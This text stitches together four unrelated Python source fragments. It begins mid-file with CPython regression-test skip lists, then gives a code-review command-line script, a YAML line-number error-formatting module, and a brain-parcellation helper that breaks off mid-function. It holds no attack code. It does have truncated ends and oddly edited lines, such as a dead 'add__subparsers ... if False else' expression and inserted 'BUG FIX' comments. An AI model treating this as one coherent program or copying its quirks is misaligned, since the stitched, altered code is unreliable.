test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_nis
test_ntpath
test_ossaudiodev
test_sunaudiodev
""",
'mac':
"""
test_al
test_atexit
test_bsddb
test_bsddb185
test_bsddb3
test_bz2
test_cd
test_cl
test_commands
test_crypt
test_curses
test_dbm
test_dl
test_fcntl
test_fork1
test_gl
test_grp
test_ioctl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_mmap
test_nis
test_ntpath
test_openpty
test_ossaudiodev
test_poll
test_popen
test_popen2
test_posix
test_pty
test_pwd
test_resource
test_signal
test_sunaudiodev
test_sundry
test_tarfile
test_timing
""",
'unixware7':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_sax
test_sunaudiodev
test_sundry
""",
'openunix8':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_sax
test_sunaudiodev
test_sundry
""",
'sco_sv3':
"""
test_al
test_applesingle
test_asynchat
test_bsddb
test_bsddb185
test_cd
test_cl
test_dl
test_fork1
test_gettext
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_queue
test_sax
test_sunaudiodev
test_sundry
test_thread
test_threaded_import
test_threadedtempfile
test_threading
""",
'riscos':
"""
test_al
test_applesingle
test_asynchat
test_atexit
test_bsddb
test_bsddb185
test_bsddb3
test_cd
test_cl
test_commands
test_crypt
test_dbm
test_dl
test_fcntl
test_fork1
test_gdbm
test_gl
test_grp
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_mmap
test_nis
test_ntpath
test_openpty
test_poll
test_popen2
test_pty
test_pwd
test_strop
test_sunaudiodev
test_sundry
test_thread
test_threaded_import
test_threadedtempfile
test_threading
test_timing
""",
'darwin':
"""
test__locale
test_al
test_bsddb
test_bsddb3
test_cd
test_cl
test_curses
test_dl
test_gdbm
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_minidom
test_nis
test_ntpath
test_ossaudiodev
test_poll
test_sunaudiodev
""",
'sunos5':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_curses
test_dbm
test_gdbm
test_gl
test_gzip
test_imgfile
test_linuxaudiodev
test_openpty
test_zipfile
test_zlib
""",
'hp-ux11':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_curses
test_dl
test_gdbm
test_gl
test_gzip
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_sax
test_sunaudiodev
test_zipfile
test_zlib
""",
'atheos':
"""
test_al
test_applesingle
test_bsddb185
test_cd
test_cl
test_curses
test_dl
test_gdbm
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_mhlib
test_mmap
test_nis
test_poll
test_popen2
test_resource
test_sunaudiodev
""",
'cygwin':
"""
test_al
test_applesingle
test_bsddb185
test_bsddb3
test_cd
test_cl
test_curses
test_dbm
test_gl
test_imgfile
test_ioctl
test_largefile
test_linuxaudiodev
test_locale
test_nis
test_ossaudiodev
test_socketserver
test_sunaudiodev
""",
'os2emx':
"""
test_al
test_applesingle
test_audioop
test_bsddb185
test_bsddb3
test_cd
test_cl
test_commands
test_curses
test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_mhlib
test_mmap
test_nis
test_openpty
test_ossaudiodev
test_pty
test_resource
test_signal
test_sunaudiodev
""",
'freebsd4':
"""
test_aepack
test_al
test_applesingle
test_bsddb
test_bsddb3
test_cd
test_cl
test_gdbm
test_gl
test_imgfile
test_linuxaudiodev
test_locale
test_macfs
test_macostools
test_nis
test_normalization
test_ossaudiodev
test_pep277
test_plistlib
test_pty
test_scriptpackages
test_socket_ssl
test_socketserver
test_sunaudiodev
test_tcl
test_timeout
test_unicode_file
test_urllibnet
test_winreg
test_winsound
""",
}
# FreeBSD 5 and 6 share FreeBSD 4's expected-skip list.
_expectations['freebsd5'] = _expectations['freebsd4']
_expectations['freebsd6'] = _expectations['freebsd4']
class _ExpectedSkips:
    """Computes the set of tests expected to be skipped on this platform,
    combining the static _expectations table with runtime conditions."""
    def __init__(self):
        import os.path
        from test import test_normalization
        from test import test_socket_ssl
        from test import test_timeout
        from test import test_codecmaps_cn, test_codecmaps_jp
        from test import test_codecmaps_kr, test_codecmaps_tw
        from test import test_codecmaps_hk
        # valid stays False when the platform is unknown to _expectations.
        self.valid = False
        if sys.platform in _expectations:
            s = _expectations[sys.platform]
            self.expected = set(s.split())
            # The following skips depend on runtime state, not just platform.
            if not os.path.supports_unicode_filenames:
                self.expected.add('test_pep277')
            if test_normalization.skip_expected:
                self.expected.add('test_normalization')
            if test_socket_ssl.skip_expected:
                self.expected.add('test_socket_ssl')
            if test_timeout.skip_expected:
                self.expected.add('test_timeout')
            for cc in ('cn', 'jp', 'kr', 'tw', 'hk'):
                if eval('test_codecmaps_' + cc).skip_expected:
                    self.expected.add('test_codecmaps_' + cc)
            # 64-bit platform check (sys.maxint equals 2**63 - 1).
            if sys.maxint == 9223372036854775807L:
                self.expected.add('test_rgbimg')
                self.expected.add('test_imageop')
            if not sys.platform in ("mac", "darwin"):
                MAC_ONLY = ["test_macostools", "test_macfs", "test_aepack",
                            "test_plistlib", "test_scriptpackages"]
                for skip in MAC_ONLY:
                    self.expected.add(skip)
            if sys.platform != "win32":
                WIN_ONLY = ["test_unicode_file", "test_winreg",
                            "test_winsound"]
                for skip in WIN_ONLY:
                    self.expected.add(skip)
            self.valid = True
    def isvalid(self):
        "Return true iff _ExpectedSkips knows about the current platform."
        return self.valid
    def getexpected(self):
        """Return set of test names we expect to skip on current platform.
        self.isvalid() must be true.
        """
        assert self.isvalid()
        return self.expected
if __name__ == '__main__':
    # Remove regrtest.py's own directory from the module search path. This
    # prevents relative imports from working, and relative imports will screw
    # up the testing framework. E.g. if both test.test_support and
    # test_support are imported, they will not contain the same globals, and
    # much of the testing framework relies on the globals in the
    # test.test_support module.
    mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
    i = pathlen = len(sys.path)
    # NOTE: i reaches -1 on the final iteration, so sys.path[-1] (the last
    # entry) is examined twice; harmless since removal is idempotent here.
    while i >= 0:
        i -= 1
        if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
            del sys.path[i]
    if len(sys.path) == pathlen:
        print 'Could not find %r in sys.path to remove it' % mydir
    main()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to manage code reviews."""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import os
import sys
from l2tdevtools.review_helpers import review
def Main():
  """The main program function.

  Parses command-line arguments, validates them, and dispatches to the
  corresponding ReviewHelper operation.

  Returns:
    bool: True if successful or False if not.
  """
  argument_parser = argparse.ArgumentParser(
      description='Script to manage code reviews.')

  # yapf: disable
  argument_parser.add_argument(
      '--project-path', '--project_path', '-p', dest='project_path',
      action='store', default=os.getcwd(), help=(
          'Path to the project being reviewed.'))

  argument_parser.add_argument(
      '--allfiles', '--all-files', '--all_files', dest='all_files',
      action='store_true', default=False, help=(
          'Apply command to all files, currently only affects the lint '
          'command.'))

  # NOTE: help-text grammar fixed ("This options" -> "This option").
  argument_parser.add_argument(
      '--diffbase', dest='diffbase', action='store', type=str,
      metavar='DIFFBASE', default='upstream/master', help=(
          'The diffbase, the default is upstream/master. This option is '
          'used to indicate to what "base" the code changes are relative '
          'to and can be used to "chain" code reviews.'))

  # NOTE: help text repaired; it previously read "...to get the OAuth token
  # should be disabled."
  argument_parser.add_argument(
      '--nobrowser', '--no-browser', '--no_browser', dest='no_browser',
      action='store_true', default=False, help=(
          'Disable the functionality to use the webbrowser to get the OAuth '
          'token.'))

  argument_parser.add_argument(
      '--noconfirm', '--no-confirm', '--no_confirm', dest='no_confirm',
      action='store_true', default=False, help=(
          'Do not ask for confirmation, apply defaults.\n'
          'WARNING: only use this when you are familiar with the defaults.'))

  argument_parser.add_argument(
      '--noedit', '--no-edit', '--no_edit', dest='no_edit', action='store_true',
      default=False, help=(
          'Do not allow edits from maintainers on the pull request.\n'
          'Changing this can result in a more tedious code review.'))

  argument_parser.add_argument(
      '--offline', dest='offline', action='store_true', default=False, help=(
          'The review script is running offline and any online check is '
          'skipped.'))

  help_message = 'Enable code style checking with yapf.'
  argument_parser.add_argument(
      '--enable-yapf', '--enable_yapf', dest='enable_yapf', action='store_true',
      default=False, help=help_message)

  commands_parser = argument_parser.add__subparsers(dest='command') if False else argument_parser.add_subparsers(dest='command')

  close_command_parser = commands_parser.add_parser('close')

  # TODO: add this to help output.
  close_command_parser.add_argument(
      'branch', action='store', metavar='BRANCH', default=None,
      help='name of the corresponding feature branch.')

  commands_parser.add_parser('create-pr')
  commands_parser.add_parser('create_pr')

  merge_command_parser = commands_parser.add_parser('merge')

  # TODO: add this to help output.
  merge_command_parser.add_argument(
      'github_origin', action='store',
      metavar='GITHUB_ORIGIN', default=None,
      help='the github origin to merge e.g. username:feature.')

  merge_edit_command_parser = commands_parser.add_parser('merge-edit')

  # TODO: add this to help output.
  merge_edit_command_parser.add_argument(
      'github_origin', action='store',
      metavar='GITHUB_ORIGIN', default=None,
      help='the github origin to merge e.g. username:feature.')

  merge_edit_command_parser = commands_parser.add_parser('merge_edit')

  # TODO: add this to help output.
  merge_edit_command_parser.add_argument(
      'github_origin', action='store',
      metavar='GITHUB_ORIGIN', default=None,
      help='the github origin to merge e.g. username:feature.')

  commands_parser.add_parser('lint')
  commands_parser.add_parser('lint-test')
  commands_parser.add_parser('lint_test')
  # yapf: enable

  # TODO: add submit option?

  commands_parser.add_parser('test')

  # TODO: add dry-run option to run merge without commit.
  # useful to test pending CLs.

  commands_parser.add_parser('update-authors')
  commands_parser.add_parser('update_authors')

  commands_parser.add_parser('update-version')
  commands_parser.add_parser('update_version')

  options = argument_parser.parse_args()

  feature_branch = None
  github_origin = None

  print_help_on_error = False
  if options.command == 'close':
    feature_branch = getattr(options, 'branch', None)
    if not feature_branch:
      print('Feature branch value is missing.')
      print_help_on_error = True

    # BUG FIX: the membership test previously ran even when feature_branch
    # was None/empty, raising TypeError instead of printing the help text.
    elif ':' in feature_branch:
      # Support "username:branch" notation.
      _, _, feature_branch = feature_branch.rpartition(':')

  if options.command in ('merge', 'merge-edit', 'merge_edit'):
    github_origin = getattr(options, 'github_origin', None)
    if not github_origin:
      print('Github origin value is missing.')
      print_help_on_error = True

  # yapf: disable
  if options.offline and options.command not in (
      'lint', 'lint-test', 'lint_test', 'test'):
    print('Cannot run: {0:s} in offline mode.'.format(options.command))
    print_help_on_error = True
  # yapf: enable

  if print_help_on_error:
    print('')
    argument_parser.print_help()
    print('')
    return False

  # A .netrc file is required for the credentials used by the helpers.
  home_path = os.path.expanduser('~')
  netrc_path = os.path.join(home_path, '.netrc')
  if not os.path.exists(netrc_path):
    print('{0:s} aborted - unable to find .netrc.'.format(
        options.command.title()))  # yapf: disable
    return False

  review_helper = review.ReviewHelper(
      options.command,
      options.project_path,
      github_origin,
      feature_branch,
      options.diffbase,
      all_files=options.all_files,
      no_browser=options.no_browser,
      no_confirm=options.no_confirm,
      no_edit=options.no_edit)

  if not review_helper.InitializeHelpers():
    return False

  if not review_helper.CheckLocalGitState():
    return False

  if not options.offline and not review_helper.CheckRemoteGitState():
    return False

  if options.command == 'merge':
    # TODO: merge disabled until re-implementation.
    return False

  if options.command in ('merge', 'merge-edit', 'merge_edit'):
    if not review_helper.PullChangesFromFork():
      return False

  if not review_helper.Lint():
    return False

  if options.enable_yapf:
    if not review_helper.CheckStyle():
      return False

  if not review_helper.Test():
    return False

  result = False
  if options.command in ('create-pr', 'create_pr'):
    result = review_helper.CreatePullRequest()

  elif options.command == 'close':
    result = review_helper.Close()

  elif options.command in ('lint', 'lint-test', 'lint_test', 'test'):
    result = True

  # NOTE: unreachable while 'merge' returns False above; kept so the dispatch
  # is complete when merge is re-enabled.
  elif options.command == 'merge':
    # result = review_helper.Merge(pull_request_issue_number)
    pass

  elif options.command in ('update-authors', 'update_authors'):
    result = review_helper.UpdateAuthors()

  elif options.command in ('update-version', 'update_version'):
    result = review_helper.UpdateVersion()

  return result
if __name__ == '__main__':
  # Exit status 0 when Main() reports success, 1 otherwise.
  sys.exit(0 if Main() else 1)
| |
import os
import re
from typing import (
Any,
AnyStr,
Callable,
Dict,
List,
MutableMapping,
MutableSequence,
Optional,
Tuple,
Union,
)
import ruamel.yaml
from ruamel.yaml.comments import CommentedBase, CommentedMap, CommentedSeq
lineno_re = re.compile("^(.*?:[0-9]+:[0-9]+: )(( *)(.*))")
def _add_lc_filename(r: ruamel.yaml.comments.CommentedBase, source: AnyStr) -> None:
    """Recursively stamp *source* as the ``lc.filename`` of *r* and of every
    nested commented node."""
    if isinstance(r, ruamel.yaml.comments.CommentedBase):
        r.lc.filename = source
    if isinstance(r, MutableSequence):
        children = iter(r)
    elif isinstance(r, MutableMapping):
        children = iter(r.values())
    else:
        children = iter(())
    for child in children:
        _add_lc_filename(child, source)
def relname(source: str) -> str:
    """Turn a file:// URI into a path relative to the working directory;
    any other string is returned unchanged."""
    prefix = "file://"
    if not source.startswith(prefix):
        return source
    return os.path.relpath(source[len(prefix):])
def add_lc_filename(r: ruamel.yaml.comments.CommentedBase, source: str) -> None:
    """Recursively record *source* (relativized via relname()) as the
    filename on *r* and all nested commented nodes."""
    _add_lc_filename(r, relname(source))
def reflow_all(text: str, maxline: Optional[int] = None) -> str:
    """Re-wrap every '<file>:<line>:<col>: message' line in *text* so the
    message part fits within *maxline* columns (default: $COLUMNS or 100),
    aligning all messages to the widest location prefix."""
    if maxline is None:
        maxline = int(os.environ.get("COLUMNS", "100"))
    maxno = 0
    # First pass: measure the widest "file:line:col: " prefix so every
    # message can be aligned to the same column.
    for line in text.splitlines():
        g = lineno_re.match(line)
        if not g:
            continue
        group = g.group(1)
        assert group is not None  # nosec
        maxno = max(maxno, len(group))
    maxno_text = maxline - maxno
    msg = []  # type: List[str]
    # Second pass: reflow matching lines; non-matching lines pass through.
    for line in text.splitlines():
        g = lineno_re.match(line)
        if not g:
            msg.append(line)
            continue
        pre = g.group(1)
        assert pre is not None  # nosec
        group2 = g.group(2)
        assert group2 is not None  # nosec
        reflowed = reflow(group2, maxno_text, g.group(3)).splitlines()
        msg.extend([pre.ljust(maxno, " ") + r for r in reflowed])
    return "\n".join(msg)
def reflow(text: str, maxline: int, shift: Optional[str] = "") -> str:
    """Word-wrap *text* at roughly *maxline* columns (minimum 20), prefixing
    each continuation line with *shift*."""
    width = max(maxline, 20)
    if len(text) <= width:
        return text
    split_at = text.rfind(" ", 0, width)
    if split_at < 1:
        # No usable space inside the window; break at the next space,
        # or not at all when the text has none.
        split_at = text.find(" ", split_at + 1)
        if split_at == -1:
            split_at = len(text)
    if split_at >= len(text):
        return text
    rest = reflow(text[split_at + 1:], width, shift)
    return "{}\n{}{}".format(text[:split_at], shift, rest)
def indent(v: str, nolead: bool = False, shift: str = "  ", bullet: str = "  ") -> str:
    """Indent every line of *v*.

    With nolead=True the first line is left untouched and each subsequent
    line is prefixed with *shift*.  Otherwise the first line gets *bullet*
    and the rest get *shift*; when a line carries a "file:line:col: " prefix
    the marker is inserted after that prefix so locations stay flush-left.
    """
    if nolead:
        lines = v.splitlines()
        if not lines:
            # Guard: the original indexed lines[0], raising on empty input.
            return v
        # BUG FIX: the original concatenated the first line directly onto the
        # joined remainder, dropping the newline between them
        # ("a\nb" became "a  b").
        return "\n".join([lines[0]] + [shift + line for line in lines[1:]])
    else:

        def lineno(i: int, line: str) -> str:
            # Place the bullet/shift after any location prefix.
            r = lineno_re.match(line)
            if r is not None:
                group1 = r.group(1)
                group2 = r.group(2)
                assert group1 is not None  # nosec
                assert group2 is not None  # nosec
                return group1 + (bullet if i == 0 else shift) + group2
            else:
                return (bullet if i == 0 else shift) + line

        return "\n".join([lineno(i, line) for i, line in enumerate(v.splitlines())])
def bullets(textlist: List[str], bul: str) -> str:
    """Render *textlist* as a bulleted list using *bul* as the bullet;
    a single entry is returned verbatim."""
    if len(textlist) == 1:
        return textlist[0]
    rendered = (indent(entry, bullet=bul) for entry in textlist)
    return "\n".join(rendered)
def strip_duplicated_lineno(text: str) -> str:
    """Same as `strip_dup_lineno` but without reflow"""
    previous = None  # type: Optional[str]
    out = []  # type: List[str]
    for line in text.splitlines():
        match = lineno_re.match(line)
        if not match:
            out.append(line)
        elif match.group(1) != previous:
            # New "file:line:col: " prefix: keep the line and remember it.
            previous = match.group(1)
            out.append(line)
        else:
            # Same prefix as the previous line: blank it out, keep message.
            prefix = match.group(1)
            body = match.group(2)
            assert prefix is not None  # nosec
            assert body is not None  # nosec
            out.append(" " * len(prefix) + body)
    return "\n".join(out)
def strip_dup_lineno(text: str, maxline: Optional[int] = None) -> str:
    """Reflow *text* to *maxline* columns (default: $COLUMNS or 100) and
    blank out consecutive duplicate "file:line:col: " prefixes so each
    source location is printed only once."""
    if maxline is None:
        maxline = int(os.environ.get("COLUMNS", "100"))
    pre = None  # type: Optional[str]
    msg = []
    maxno = 0
    # First pass: measure the widest location prefix for alignment.
    for line in text.splitlines():
        g = lineno_re.match(line)
        if not g:
            continue
        group1 = g.group(1)
        assert group1 is not None  # nosec
        maxno = max(maxno, len(group1))
    for line in text.splitlines():
        g = lineno_re.match(line)
        if not g:
            msg.append(line)
            continue
        if g.group(1) != pre:
            # New location: emit the prefix padded to the common width.
            group3 = g.group(3)
            assert group3 is not None  # nosec
            shift = maxno + len(group3)
            group2 = g.group(2)
            assert group2 is not None  # nosec
            g2 = reflow(group2, maxline - shift, " " * shift)
            pre = g.group(1)
            assert pre is not None  # nosec
            msg.append(pre + " " * (maxno - len(pre)) + g2)
        else:
            # Repeated location: replace the prefix with blanks.
            group2 = g.group(2)
            assert group2 is not None  # nosec
            group3 = g.group(3)
            assert group3 is not None  # nosec
            g2 = reflow(group2, maxline - maxno, " " * (maxno + len(group3)))
            msg.append(" " * maxno + g2)
    return "\n".join(msg)
def cmap(
    d: Union[int, float, str, Dict[str, Any], List[Any], None],
    lc: Optional[List[int]] = None,
    fn: Optional[str] = None,
) -> Union[int, float, str, CommentedMap, CommentedSeq, None]:
    """Recursively convert plain mappings/sequences into CommentedMap /
    CommentedSeq nodes, propagating line/column info (*lc*, a 4-element
    [line, col, line, col] list) and filename (*fn*) onto every node.
    Scalars are returned unchanged."""
    if lc is None:
        lc = [0, 0, 0, 0]
    if fn is None:
        fn = "test"
    if isinstance(d, CommentedMap):
        # Already commented: recurse in place, reusing per-key positions
        # when the map records them.
        fn = d.lc.filename if hasattr(d.lc, "filename") else fn
        for k, v in d.items():
            if d.lc.data is not None and k in d.lc.data:
                d[k] = cmap(v, lc=d.lc.data[k], fn=fn)
            else:
                d[k] = cmap(v, lc, fn=fn)
        return d
    if isinstance(d, CommentedSeq):
        fn = d.lc.filename if hasattr(d.lc, "filename") else fn
        for k2, v2 in enumerate(d):
            if d.lc.data is not None and k2 in d.lc.data:
                d[k2] = cmap(v2, lc=d.lc.data[k2], fn=fn)
            else:
                d[k2] = cmap(v2, lc, fn=fn)
        return d
    if isinstance(d, MutableMapping):
        cm = CommentedMap()
        # Keys are sorted so the resulting map has a deterministic order.
        for k in sorted(d.keys()):
            v = d[k]
            if isinstance(v, CommentedBase):
                # Child already carries position info; inherit it.
                uselc = [v.lc.line, v.lc.col, v.lc.line, v.lc.col]
                vfn = v.lc.filename if hasattr(v.lc, "filename") else fn
            else:
                uselc = lc
                vfn = fn
            cm[k] = cmap(v, lc=uselc, fn=vfn)
            cm.lc.add_kv_line_col(k, uselc)
            cm.lc.filename = fn
        return cm
    if isinstance(d, MutableSequence):
        cs = CommentedSeq()
        for k3, v3 in enumerate(d):
            if isinstance(v3, CommentedBase):
                uselc = [v3.lc.line, v3.lc.col, v3.lc.line, v3.lc.col]
                vfn = v3.lc.filename if hasattr(v3.lc, "filename") else fn
            else:
                uselc = lc
                vfn = fn
            cs.append(cmap(v3, lc=uselc, fn=vfn))
            cs.lc.add_kv_line_col(k3, uselc)
            cs.lc.filename = fn
        return cs
    else:
        return d
class SourceLine:
    """Track a YAML node (and optionally one key inside it) so that errors
    can be reported with a ``file:line:column:`` prefix."""

    def __init__(
        self,
        item: Any,
        key: Optional[Any] = None,
        raise_type: Callable[[str], Any] = str,
        include_traceback: bool = False,
    ) -> None:
        self.item = item
        self.key = key
        self.raise_type = raise_type
        self.include_traceback = include_traceback

    def __enter__(self) -> "SourceLine":
        return self

    def __exit__(
        self,
        exc_type: Any,
        exc_value: Any,
        tb: Any,
    ) -> None:
        if not exc_value:
            return
        # Re-raise the in-context exception wrapped with location info.
        raise self.makeError(str(exc_value)) from exc_value

    def file(self) -> Optional[str]:
        """Filename recorded on the wrapped node, or None if unknown."""
        lc = getattr(self.item, "lc", None)
        if lc is not None and hasattr(lc, "filename"):
            return str(lc.filename)
        return None

    def start(self) -> Optional[Tuple[int, int]]:
        """1-based (line, column) of the item, or of ``self.key`` in it."""
        if self.file() is None:
            return None
        lc = self.item.lc
        if self.key is None or lc.data is None or self.key not in lc.data:
            return ((lc.line or 0) + 1, (lc.col or 0) + 1)
        key_lc = lc.data[self.key]
        return ((key_lc[0] or 0) + 1, (key_lc[1] or 0) + 1)

    def end(self) -> Optional[Tuple[int, int]]:
        """End positions are not tracked."""
        return None

    def makeLead(self) -> str:
        """Return the ``file:line:col:`` prefix, or '' without a file."""
        path = self.file()
        if not path:
            return ""
        position = self.start() or ("", "")
        return f"{path}:{position[0]}:{position[1]}:"

    def makeError(self, msg: str) -> Any:
        """Wrap *msg* in ``raise_type``, prefixing every line that does not
        already carry a location with this node's location."""
        if not isinstance(self.item, ruamel.yaml.comments.CommentedBase):
            return self.raise_type(msg)
        lead = self.makeLead()
        decorated = [
            m if lineno_re.match(m) else f"{lead} {m}" for m in msg.splitlines()
        ]
        return self.raise_type("\n".join(decorated))
| |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
from nipype.interfaces.base import (
BaseInterface, BaseInterfaceInputSpec, traits,
File, TraitedSpec, Directory, isdefined)
import os
import os.path as op
import numpy as np
import nibabel as nb
import networkx as nx
import shutil
from nipype.utils.misc import package_check
import warnings
from ... import logging
iflogger = logging.getLogger('interface')
# Probe for the optional ConnectomeMapper (cmp) dependency once, at import
# time; the parcellation helpers below require it, so we record availability
# instead of failing the whole module import.
have_cmp = True
try:
    package_check('cmp')
except Exception:
    # Py3-compatible form of `except Exception, e:`; the exception object
    # was never used.
    have_cmp = False
else:
    import cmp
    from cmp.util import runCmd
def create_annot_label(subject_id, subjects_dir, fs_dir, parcellation_name):
    """Create the FreeSurfer annotation and label files required by the
    Lausanne2008 parcellation ``parcellation_name`` for ``subject_id``.

    For every atlas of the requested scale this runs ``mris_ca_label`` and
    ``mri_annotation2label``, then rasterizes the unknown/corpus-callosum
    labels into ``cc_unknown.nii.gz`` and converts the cortical ribbon and
    aseg volumes to NIfTI.
    """
    iflogger.info("Create the cortical labels necessary for our ROIs")
    iflogger.info("=================================================")
    fs_label_dir = op.join(op.join(subjects_dir, subject_id), 'label')
    output_dir = op.abspath(op.curdir)
    paths = []
    cmp_config = cmp.configuration.PipelineConfiguration()
    cmp_config.parcellation_scheme = "Lausanne2008"
    for hemi in ['lh', 'rh']:
        spath = cmp_config._get_lausanne_parcellation(
            'Lausanne2008')[parcellation_name]['fs_label_subdir_name'] % hemi
        paths.append(spath)
    # Create the per-hemisphere label subdirectories; ignore the error when
    # a directory already exists (was a bare `except:` before).
    for p in paths:
        try:
            os.makedirs(op.join('.', p))
        except OSError:
            pass
    # Each entry: (hemisphere, gcs atlas file, output annotation file,
    # label output subdirectory, annotation name for mri_annotation2label).
    if '33' in parcellation_name:
        comp = [
            ('rh', 'myatlas_36_rh.gcs', 'rh.myaparc_36.annot',
             'regenerated_rh_36', 'myaparc_36'),
            ('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
             'regenerated_rh_60', 'myaparc_60'),
            ('lh', 'myatlas_36_lh.gcs', 'lh.myaparc_36.annot',
             'regenerated_lh_36', 'myaparc_36'),
            ('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
             'regenerated_lh_60', 'myaparc_60'),
        ]
    elif '60' in parcellation_name:
        comp = [
            ('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
             'regenerated_rh_60', 'myaparc_60'),
            ('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
             'regenerated_lh_60', 'myaparc_60'),
        ]
    elif '125' in parcellation_name:
        comp = [
            ('rh', 'myatlas_125_rh.gcs', 'rh.myaparc_125.annot',
             'regenerated_rh_125', 'myaparc_125'),
            ('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
             'regenerated_rh_60', 'myaparc_60'),
            ('lh', 'myatlas_125_lh.gcs', 'lh.myaparc_125.annot',
             'regenerated_lh_125', 'myaparc_125'),
            ('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
             'regenerated_lh_60', 'myaparc_60'),
        ]
    elif '250' in parcellation_name:
        comp = [
            ('rh', 'myatlas_250_rh.gcs', 'rh.myaparc_250.annot',
             'regenerated_rh_250', 'myaparc_250'),
            ('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
             'regenerated_rh_60', 'myaparc_60'),
            ('lh', 'myatlas_250_lh.gcs', 'lh.myaparc_250.annot',
             'regenerated_lh_250', 'myaparc_250'),
            ('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
             'regenerated_lh_60', 'myaparc_60'),
        ]
    else:
        # scale500: the finest scale needs the partitioned P1-P36 atlases
        # plus every coarser scale for the later mask/label steps.
        comp = [
            ('rh', 'myatlas_36_rh.gcs', 'rh.myaparc_36.annot',
             'regenerated_rh_36', 'myaparc_36'),
            ('rh', 'myatlasP1_16_rh.gcs', 'rh.myaparcP1_16.annot',
             'regenerated_rh_500', 'myaparcP1_16'),
            ('rh', 'myatlasP17_28_rh.gcs', 'rh.myaparcP17_28.annot',
             'regenerated_rh_500', 'myaparcP17_28'),
            ('rh', 'myatlasP29_36_rh.gcs', 'rh.myaparcP29_36.annot',
             'regenerated_rh_500', 'myaparcP29_36'),
            ('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
             'regenerated_rh_60', 'myaparc_60'),
            ('rh', 'myatlas_125_rh.gcs', 'rh.myaparc_125.annot',
             'regenerated_rh_125', 'myaparc_125'),
            ('rh', 'myatlas_250_rh.gcs', 'rh.myaparc_250.annot',
             'regenerated_rh_250', 'myaparc_250'),
            ('lh', 'myatlas_36_lh.gcs', 'lh.myaparc_36.annot',
             'regenerated_lh_36', 'myaparc_36'),
            ('lh', 'myatlasP1_16_lh.gcs', 'lh.myaparcP1_16.annot',
             'regenerated_lh_500', 'myaparcP1_16'),
            ('lh', 'myatlasP17_28_lh.gcs', 'lh.myaparcP17_28.annot',
             'regenerated_lh_500', 'myaparcP17_28'),
            ('lh', 'myatlasP29_36_lh.gcs', 'lh.myaparcP29_36.annot',
             'regenerated_lh_500', 'myaparcP29_36'),
            ('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
             'regenerated_lh_60', 'myaparc_60'),
            ('lh', 'myatlas_125_lh.gcs', 'lh.myaparc_125.annot',
             'regenerated_lh_125', 'myaparc_125'),
            ('lh', 'myatlas_250_lh.gcs', 'lh.myaparc_250.annot',
             'regenerated_lh_250', 'myaparc_250'),
        ]
    log = cmp_config.get_logger()
    for out in comp:
        # Classify cortical surface vertices with the atlas ...
        mris_cmd = 'mris_ca_label %s %s "%s/surf/%s.sphere.reg" "%s" "%s" ' % (
            subject_id, out[0], op.join(subjects_dir, subject_id), out[0],
            cmp_config.get_lausanne_atlas(out[1]), op.join(fs_label_dir, out[2]))
        runCmd(mris_cmd, log)
        iflogger.info('-----------')
        # ... then split the annotation into individual label files.
        annot = '--annotation "%s"' % out[4]
        mri_an_cmd = 'mri_annotation2label --subject %s --hemi %s --outdir "%s" %s' % (subject_id, out[0], op.join(output_dir, out[3]), annot)
        iflogger.info(mri_an_cmd)
        runCmd(mri_an_cmd, log)
        iflogger.info('-----------')
        iflogger.info(os.environ['SUBJECTS_DIR'])
    # extract cc and unknown to add to tractography mask, we do not want this as a region of interest
    # in FS 5.0, unknown and corpuscallosum are not available for the 35 scale (why?),
    # but for the other scales only, take the ones from _60
    rhun = op.join(output_dir, 'rh.unknown.label')
    lhun = op.join(output_dir, 'lh.unknown.label')
    rhco = op.join(output_dir, 'rh.corpuscallosum.label')
    lhco = op.join(output_dir, 'lh.corpuscallosum.label')
    shutil.copy(
        op.join(output_dir, 'regenerated_rh_60', 'rh.unknown.label'), rhun)
    shutil.copy(
        op.join(output_dir, 'regenerated_lh_60', 'lh.unknown.label'), lhun)
    shutil.copy(op.join(
        output_dir, 'regenerated_rh_60', 'rh.corpuscallosum.label'), rhco)
    shutil.copy(op.join(
        output_dir, 'regenerated_lh_60', 'lh.corpuscallosum.label'), lhco)
    # Rasterize the four labels into a single cc_unknown volume.
